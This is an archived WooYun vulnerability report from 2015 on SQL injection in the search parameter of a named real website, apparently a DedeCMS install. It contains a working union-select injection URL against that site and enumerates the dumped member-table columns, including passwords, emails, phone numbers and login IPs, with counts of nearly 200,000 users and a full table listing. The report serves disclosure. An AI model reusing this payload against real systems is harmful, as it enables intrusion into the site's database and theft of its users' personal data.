乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-07-09: 细节已通知厂商并且等待厂商处理中 2015-07-14: 厂商已经主动忽略漏洞,细节向公众公开
注入参数:qpayload:http://www.uimaker.com/search.php?q=99999.9'+union+all+select+1,2,3,4,5,6,7,concat(0x7e,0x21,database(),0x21,0x7e,version(),0x21),8,9,10,11,12,13,14,15,16,17,18,19--+a&=
dede_member count:89236 mid mtype userid pwd uname sex rank uptime exptime money email scores matt spacesta face safequestion safeanswer jointime joinip logintime loginip checkmail new_zhiye new_sheng new_shi new_birthday new_school new_site new_QQ fromid fromuser fromzt fromurl dede_member_person count:95896 mid onlynet sex uname qq msn tel mobile place oldplace birthday star income education height bodytype blood vocation smoke marital house drink datingtype language nature lovemsg address uptime
可以看到涉及的用户数量上快20W了以下为部分的用户信息资料
部分数据库表项结构:
a0504100607 dede_addonarticle dede_addonimages dede_addoninfos dede_addonshop dede_addonsoft dede_addonspec dede_admin dede_admintype dede_advancedsearch dede_arcatt dede_arccache dede_archives dede_arcmulti dede_arcrank dede_arctiny dede_arctype dede_area dede_ask dede_askanswer dede_asktype dede_channeltype dede_co_htmls dede_co_mediaurls dede_co_note dede_co_onepage dede_co_urls dede_diyforms dede_log dede_mail_order dede_mail_title dede_member dede_member_company dede_member_feed dede_member_fensi dede_member_flink dede_member_friends dede_member_group dede_member_guestbook dede_member_model dede_member_msg dede_member_operation dede_member_person dede_member_pms dede_member_qzonelogin dede_member_snsmsg dede_member_space dede_member_stow dede_member_stowtype dede_member_tj dede_member_type dede_member_ub dede_member_vhistory dede_member_xly dede_moneycard_record dede_moneycard_type dede_mtypes dede_multiserv_config dede_myad dede_myadtype dede_mytag dede_payment dede_plus dede_purview dede_pwd_tmp dede_ratings dede_search_cache dede_search_keywords dede_sgpage dede_shops_delivery dede_shops_orders dede_shops_paytype dede_shops_products dede_shops_userinfo dede_softconfig dede_sphinx dede_stepselect dede_surplus_log dede_sys_enum dede_sys_module dede_sys_set dede_sys_task dede_sysconfig dede_tagindex dede_taglist
危害等级:无影响厂商忽略
忽略时间:2015-07-14 15:58
漏洞Rank:4 (WooYun评价)
暂无